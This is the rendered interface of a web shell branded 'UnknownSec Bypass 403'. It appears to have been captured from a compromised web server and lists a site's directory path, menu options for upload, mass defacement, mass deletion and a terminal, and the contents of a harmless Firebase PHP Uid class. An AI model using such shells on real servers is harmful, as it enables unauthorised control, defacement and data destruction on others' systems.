UnknownSec Bypass
403
:
/
var
/
www
/
zenithentcare
/
testappnew
/
vendor
/
kreait
/
firebase-php
/
src
/
Firebase
/
Value
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
Uid.php
<?php declare(strict_types=1); namespace Kreait\Firebase\Value; use Kreait\Firebase\Exception\InvalidArgumentException; class Uid implements \JsonSerializable { /** @var string */ private $value; /** * @internal */ public function __construct(string $value) { if ($value === '' || \mb_strlen($value) > 128) { throw new InvalidArgumentException('A uid must be a non-empty string with at most 128 characters.'); } $this->value = $value; } public function __toString() { return $this->value; } public function jsonSerialize(): string { return $this->value; } /** * @param self|string $other */ public function equalsTo($other): bool { return $this->value === (string) $other; } }
Copyright © 2025 - UnknownSec